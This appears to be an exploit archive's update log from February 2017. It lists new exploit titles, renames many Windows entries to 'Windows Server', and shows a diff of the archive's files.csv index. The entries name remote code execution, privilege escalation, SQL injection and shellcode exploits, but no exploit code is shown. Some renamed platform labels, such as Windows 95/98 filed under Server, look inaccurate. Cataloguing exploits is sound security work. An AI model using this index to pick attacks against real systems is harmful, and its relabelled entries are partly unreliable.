DB: 2017-02-03

12 new exploits

Microsoft Windows 2000 - RPC DCOM Interface Denial of Service
Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service

Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit
Microsoft Windows Server 2003/XP - Samba Share Resource Exhaustion Exploit

Microsoft Windows 2000/XP - TCP Connection Reset Remote Attack Tool
Microsoft Windows Server 2000/XP - TCP Connection Reset Remote Attack Tool

Microsoft Windows 2003/XP - Remote Denial of Service
Microsoft Windows Server 2003/XP - Remote Denial of Service

Microsoft Windows 2003/XP - IPv6 Remote Denial of Service
Microsoft Windows Server 2003/XP - IPv6 Remote Denial of Service

Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak Denial of Service
Microsoft Windows Server 2000 - UPNP (getdevicelist) Memory Leak Denial of Service

Microsoft Windows 2003 - '.EOT' Blue Screen of Death Crash
Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash

Microsoft Windows 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)
Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)

Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service
Microsoft Windows Server 2000/2003/XP - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
Microsoft Windows Server 2000/2003/XP - 'win32k.sys' SfnINSTRING Local kernel Denial of Service

Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow
Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow

Microsoft Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service
Microsoft Windows Server 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service

NT 4.0 / Windows 2000 - TCP/IP Printing Service Denial of Service
Microsoft Windows Server 2000/NT 4.0 - TCP/IP Printing Service Denial of Service

Microsoft Windows 2000 - Telnet Server Denial of Service
Microsoft Windows Server 2000 - Telnet Server Denial of Service

Microsoft Windows 2000 - Telnet 'Username' Denial of Service
Microsoft Windows Server 2000 - Telnet 'Username' Denial of Service

Microsoft Windows 2000 - RunAs Service Denial of Service
Microsoft Windows Server 2000 - RunAs Service Denial of Service

Microsoft Windows 2000/NT - Terminal Server Service RDP Denial of Service
Microsoft Windows Server 2000/NT - Terminal Server Service RDP Denial of Service

Microsoft Windows 2000/XP - GDI Denial of Service
Microsoft Windows Server 2000/XP - GDI Denial of Service
Microsoft Windows 2000 - Internet Key Exchange Denial of Service (1)
Microsoft Windows 2000 - Internet Key Exchange Denial of Service (2)
Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (1)
Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (2)
Microsoft Windows 2000/NT 4 - TCP Stack Denial of Service (1)
Microsoft Windows 2000/NT 4 - TCP Stack Denial of Service (2)
Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (1)
Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (2)
Microsoft Windows 2000 - Lanman Denial of Service (1)
Microsoft Windows 2000 - Lanman Denial of Service (2)
Microsoft Windows Server 2000 - Lanman Denial of Service (1)
Microsoft Windows Server 2000 - Lanman Denial of Service (2)
Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)
Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)
Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)
Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)

Microsoft Windows 2000/2003/XP - Graphical Device Interface Library Denial of Service
Microsoft Windows Server 2000/2003/XP - Graphical Device Interface Library Denial of Service

Microsoft Windows 2000/XP - Internet Protocol Validation Remote Code Execution (1)
Microsoft Windows Server 2000/XP - Internet Protocol Validation Remote Code Execution (1)

Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)
Microsoft Windows Server 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)

Microsoft Windows 2000/2003/XP - CreateRemoteThread Local Denial of Service
Microsoft Windows Server 2000/2003/XP - CreateRemoteThread Local Denial of Service

Microsoft Windows 2000/XP - Registry Access Local Denial of Service
Microsoft Windows Server 2000/XP - Registry Access Local Denial of Service

Microsoft Windows 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities
Microsoft Windows Server 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities

Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service
Microsoft Windows Server 2003/XP - Explorer .WMF File Handling Denial of Service

Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service
Microsoft Windows Server 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service
Microsoft Windows 10 - SMBv3 Tree Connect (PoC)
Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption
Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)
Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)
Microsoft Windows Server 2003 - Token Kidnapping Local Exploit (PoC)
Microsoft Windows Server 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)

Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)
Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)

Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)
Microsoft Windows Server 2003/XP - 'afd.sys' Privilege Escalation (MS11-080)

Microsoft Windows 2000/95/98/NT 4.0 - Long Filename Extension
Microsoft Windows Server 2000/95/98/NT 4.0 - Long Filename Extension

Microsoft Windows 2000 - Named Pipes Predictability
Microsoft Windows Server 2000 - Named Pipes Predictability

Microsoft Windows 2000 - Still Image Service Privilege Escalation
Microsoft Windows Server 2000 - Still Image Service Privilege Escalation

Microsoft Windows 2000/NT 4 - DLL Search Path
Microsoft Windows Server 2000/NT 4 - DLL Search Path

Microsoft Windows 2000 - Debug Registers
Microsoft Windows Server 2000 - Debug Registers

Microsoft Windows 2000 - RunAs Service Named Pipe Hijacking
Microsoft Windows Server 2000 - RunAs Service Named Pipe Hijacking

Microsoft Windows 2000/NT 4 - NTFS File Hiding
Microsoft Windows Server 2000/NT 4 - NTFS File Hiding

Microsoft Windows 2000 / NT 4.0 - Process Handle Local Privilege Elevation
Microsoft Windows Server 2000/NT 4.0 - Process Handle Local Privilege Elevation
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (1)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (2)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (3)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (4)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (5)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (6)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (7)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (8)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (1)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (2)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (3)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (4)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (5)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (6)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (7)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (8)
Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation (1)
Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation (2)
Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (1)
Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (2)

Microsoft Windows 2000 - Help Facility .CNT File :Link Buffer Overflow
Microsoft Windows Server 2000 - Help Facility .CNT File :Link Buffer Overflow

Microsoft Windows 2000 - RegEdit.exe Registry Key Value Buffer Overflow
Microsoft Windows Server 2000 - RegEdit.exe Registry Key Value Buffer Overflow
Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation (1)
Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation (2)
Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (1)
Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2)

Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)
Microsoft Windows Server 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)

Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)
Microsoft Windows Server 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)

Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ)
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - Local Ring Exploit (EPATHOBJ)

Microsoft Windows 2000/2003/XP - Keyboard Event Privilege Escalation
Microsoft Windows Server 2000/2003/XP - Keyboard Event Privilege Escalation

Microsoft Windows 2003/XP - ReadDirectoryChangesW Information Disclosure
Microsoft Windows Server 2003/XP - ReadDirectoryChangesW Information Disclosure
Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Privilege Escalation
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation
Microsoft Windows Server 2003/2008/XP/Vista - WMI Service Isolation Privilege Escalation
Microsoft Windows Server 2003/XP - RPCSS Service Isolation Privilege Escalation

Microsoft Windows 2000/XP/2003 - Desktop Wall Paper System Parameter Privilege Escalation
Microsoft Windows Server 2000/2003/XP - Desktop Wall Paper System Parameter Privilege Escalation

Microsoft Windows 2000/XP/2003/Vista - Double-Free Memory Corruption Privilege Escalation
Microsoft Windows Server 2000/2003/XP/Vista - Double-Free Memory Corruption Privilege Escalation

Ghostscript 9.20 - 'Filename' Command Execution

Microsoft Windows 2000 - RSVP Server Authority Hijacking (PoC)
Microsoft Windows Server 2000 - RSVP Server Authority Hijacking (PoC)

Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit
Microsoft Windows Server 2000/XP - RPC Remote (Non Exec Memory) Exploit
Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)
Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)
Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (1)
Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (2)

Microsoft Windows 2000 - WINS Remote Code Execution
Microsoft Windows Server 2000 - WINS Remote Code Execution

Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)
Microsoft Windows Server 2003/XP - Metafile Escape() Code Execution (Metasploit)
WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Python)
WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Perl)
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl)

Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow

Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow (Windows 2000)
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow

Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
Microsoft Windows Server 2003/XP/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)

Microsoft Internet Explorer 5 (Windows 2000/95/98/NT 4) - XML HTTP Redirect
Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4) - XML HTTP Redirect

Microsoft Index Server 2.0 / Indexing Services (Windows 2000) - Directory Traversal
Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - Directory Traversal

Cat Soft Serv-U FTP Server 2.5/a/b (Windows 2000/95/98/NT 4.0) - Shortcut Exploit
Cat Soft Serv-U FTP Server 2.5/a/b (Windows 95/98/2000/NT 4.0) - Shortcut Exploit

Microsoft Windows 2000 - Remote CPU-overload
Microsoft Windows Server 2000 - Remote CPU-overload

Microsoft Windows 2000 - telnet.exe NTLM Authentication
Microsoft Windows Server 2000 - telnet.exe NTLM Authentication

Microsoft Indexing Services (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting
Microsoft Indexing Service (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting

Microsoft Indexing Services (Windows 2000) - File Verification
Microsoft Indexing Service (Windows 2000) - File Verification
SurfControl SuperScout WebFilter for windows 2000 - File Disclosure
SurfControl SuperScout WebFilter for windows 2000 - SQL Injection
Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow
SurfControl SuperScout WebFilter for Windows 2000 - File Disclosure
SurfControl SuperScout WebFilter for Windows 2000 - SQL Injection
Microsoft Windows Server 2000/NT 4/XP - Help Facility ActiveX Control Buffer Overflow

Microsoft Windows 2000 - Active Directory Remote Stack Overflow
Microsoft Windows Server 2000 - Active Directory Remote Stack Overflow

Microsoft Windows 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow
Microsoft Windows Server 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow

Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking
Microsoft Windows Server 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking
Microsoft Windows 2000/2003/XP - winhlp32 Phrase Integer Overflow
Microsoft Windows 2000/2003/XP - winhlp32 Phrase Heap Overflow
Microsoft Windows Server 2000/2003/XP - winhlp32 Phrase Integer Overflow
Microsoft Windows Server 2000/2003/XP - winhlp32 Phrase Heap Overflow

Microsoft Windows 2000/XP - Internet Protocol Validation Remote Code Execution (2)
Microsoft Windows Server 2000/XP - Internet Protocol Validation Remote Code Execution (2)
Microsoft Windows 2000/2003 - Recursive DNS Spoofing (1)
Microsoft Windows 2000/2003 - Recursive DNS Spoofing (2)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)

Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)
Travel Portal Script 9.33 - SQL Injection
Movie Portal Script 7.35 - SQL Injection
Itech Travel Portal Script 9.33 - SQL Injection
Itech Movie Portal Script 7.35 - SQL Injection

Auction Script 6.49 - SQL Injection
Itech Auction Script 6.49 - 'mcid' Parameter SQL Injection

Itech News Portal Script 6.28 - SQL Injection
Itech News Portal Script 6.28 - 'inf' Parameter SQL Injection

Video Sharing Script 4.94 - SQL Injection
Itech Video Sharing Script 4.94 - 'v' Parameter SQL Injection

Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection
Itech Classifieds Script 7.27 - SQL Injection

Video Sharing Script 4.94 - 'uid' Parameter SQL Injection
Itech Video Sharing Script 4.94 - SQL Injection
WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Python)
WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Ruby)
Itech Travel Portal Script 9.35 - SQL Injection
Property Listing Script - 'propid' Parameter Blind SQL Injection
Itech Inventory Management Software 3.77 - SQL Injection
Itech Movie Portal Script 7.37 - SQL Injection
Itech News Portal Script 6.28 - 'sc' Parameter SQL Injection
Itech Auction Script 6.49 - 'pid' Parameter SQL Injection

files.csv

@@ -8,7 +8,7 @@ id,file,description,date,author,platform,type,port
 35,platforms/windows/dos/35.c,"Microsoft IIS 5.0 < 5.1 - Remote Denial of Service",2003-05-31,Shachank,windows,dos,0
 59,platforms/hardware/dos/59.c,"Cisco IOS - IPv4 Packets Denial of Service",2003-07-18,l0cK,hardware,dos,0
 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service",2003-07-21,"Martin Kluge",hardware,dos,0
-61,platforms/windows/dos/61.c,"Microsoft Windows 2000 - RPC DCOM Interface Denial of Service",2003-07-21,Flashsky,windows,dos,0
+61,platforms/windows/dos/61.c,"Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service",2003-07-21,Flashsky,windows,dos,0
 62,platforms/hardware/dos/62.sh,"Cisco IOS - (using hping) Remote Denial of Service",2003-07-22,zerash,hardware,dos,0
 65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0
 68,platforms/linux/dos/68.c,"Linux Kernel 2.4.20 - 'decode_fh' Denial of Service",2003-07-29,"Jared Stanbrough",linux,dos,0
@@ -20,7 +20,7 @@ id,file,description,date,author,platform,type,port
 115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0
 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 < 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",windows,dos,0
-148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
+148,platforms/windows/dos/148.sh,"Microsoft Windows Server 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.exe Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
 161,platforms/windows/dos/161.c,"Red Faction 1.20 - Server Reply Remote Buffer Overflow",2004-03-04,"Luigi Auriemma",windows,dos,0
 170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0
@@ -40,7 +40,7 @@ id,file,description,date,author,platform,type,port
 262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0
 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0
 274,platforms/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",linux,dos,0
-276,platforms/windows/dos/276.delphi,"Microsoft Windows 2000/XP - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0
+276,platforms/windows/dos/276.delphi,"Microsoft Windows Server 2000/XP - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0
 298,platforms/windows/dos/298.pl,"Emule 0.42e - Remote Denial of Service",2004-05-16,"Rafel Ivgi",windows,dos,80
 299,platforms/windows/dos/299.c,"Symantec Multiple Firewall - DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos,0
 306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service",2004-06-25,lorenzo,linux,dos,0
@@ -142,7 +142,7 @@ id,file,description,date,author,platform,type,port
 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0
 855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - HTTP GET request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0
 856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - (BlueTooth Nickname) Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0
-861,platforms/windows/dos/861.c,"Microsoft Windows 2003/XP - Remote Denial of Service",2005-03-07,RusH,windows,dos,0
+861,platforms/windows/dos/861.c,"Microsoft Windows Server 2003/XP - Remote Denial of Service",2005-03-07,RusH,windows,dos,0
 867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0
 869,platforms/bsd/dos/869.c,"OpenBSD 2.0 < 3.6 - TCP Timestamp Remote Denial of Service",2005-03-09,RusH,bsd,dos,0
 874,platforms/windows/dos/874.cpp,"Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow",2005-03-12,"Leon Juranic",windows,dos,0
@@ -174,7 +174,7 @@ id,file,description,date,author,platform,type,port
 988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service",2005-05-08,basher13,windows,dos,0
 998,platforms/linux/dos/998.c,"Linux Kernel 2.6.12-rc4 - 'ioctl_by_bdev' Local Denial of Service",2005-05-17,alert7,linux,dos,0
 999,platforms/linux/dos/999.c,"Gaim 1.2.1 - URL Handling Remote Stack Overflow",2005-05-17,Ron,linux,dos,0
-1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service",2005-05-17,"Konrad Malewski",windows,dos,0
+1000,platforms/windows/dos/1000.cpp,"Microsoft Windows Server 2003/XP - IPv6 Remote Denial of Service",2005-05-17,"Konrad Malewski",windows,dos,0
 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos,0
 1024,platforms/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0
 1025,platforms/windows/dos/1025.html,"Microsoft Internet Explorer - JavaScript 'window()' Crash",2005-05-31,"Benjamin Franz",windows,dos,0
@@ -249,7 +249,7 @@ id,file,description,date,author,platform,type,port
 1286,platforms/windows/dos/1286.c,"GO-Global Windows Clients 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0
 1287,platforms/windows/dos/1287.c,"GO-Global Windows Server 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0
 1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - (imapd) Remote Buffer Overflow (PoC)",2005-11-16,"Luca Ercoli",windows,dos,0
-1328,platforms/windows/dos/1328.c,"Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak Denial of Service",2005-11-16,"Winny Thomas",windows,dos,0
+1328,platforms/windows/dos/1328.c,"Microsoft Windows Server 2000 - UPNP (getdevicelist) Memory Leak Denial of Service",2005-11-16,"Winny Thomas",windows,dos,0
 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin 7.0.19.0 - 'action' Denial of Service",2005-11-18,BassReFLeX,multiple,dos,0
 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow (PoC)",2005-11-21,"Inge Henriksen",windows,dos,0
 1338,platforms/hardware/dos/1338.pl,"Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service",2005-11-23,"Janis Vizulis",hardware,dos,0
@@ -1148,7 +1148,7 @@ id,file,description,date,author,platform,type,port
 9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-07,"opt!x hacker",windows,dos,0
 9401,platforms/windows/dos/9401.py,"SpiceWorks 3.6 - Accept Parameter Overflow Crash",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0
 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow (PoC)",2009-08-11,"fl0 fl0w",windows,dos,0
-9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - '.EOT' Blue Screen of Death Crash",2009-08-11,webDEViL,windows,dos,0
+9417,platforms/windows/dos/9417.txt,"Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash",2009-08-11,webDEViL,windows,dos,0
 9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash",2009-08-12,murderkey,windows,dos,0
 9427,platforms/windows/dos/9427.py,"VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0
 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0
@@ -1236,7 +1236,7 @@ id,file,description,date,author,platform,type,port
 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0
 10022,platforms/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0
 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
-10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0
+10068,platforms/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0
 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21
 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389
 33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
@@ -1499,7 +1499,7 @@ id,file,description,date,author,platform,type,port
 12252,platforms/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos,0
 12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0
 12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0
-12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)",2010-04-17,"laurent gaffie",windows,dos,0
+12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)",2010-04-17,"laurent gaffie",windows,dos,0
 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
 12294,platforms/windows/dos/12294.txt,"avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Denial of Service / Modem Reset",2010-04-19,hkm,hardware,dos,0
@@ -1507,8 +1507,8 @@ id,file,description,date,author,platform,type,port
 12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0
 12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0
 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote Denial of Service",2010-04-22,Andi,linux,dos,0
-12336,platforms/windows/dos/12336.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
+12336,platforms/windows/dos/12336.c,"Microsoft Windows Server 2000/2003/XP - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
-12337,platforms/windows/dos/12337.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
+12337,platforms/windows/dos/12337.c,"Microsoft Windows Server 2000/2003/XP - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - 'EDImage.ocx' Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0
 12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos,0
 12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death)",2010-04-23,p4r4N0ID,windows,dos,0
@@ -1883,7 +1883,7 @@ id,file,description,date,author,platform,type,port
 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Denial of Service Skinfile",2011-02-06,badc0re,windows,dos,0
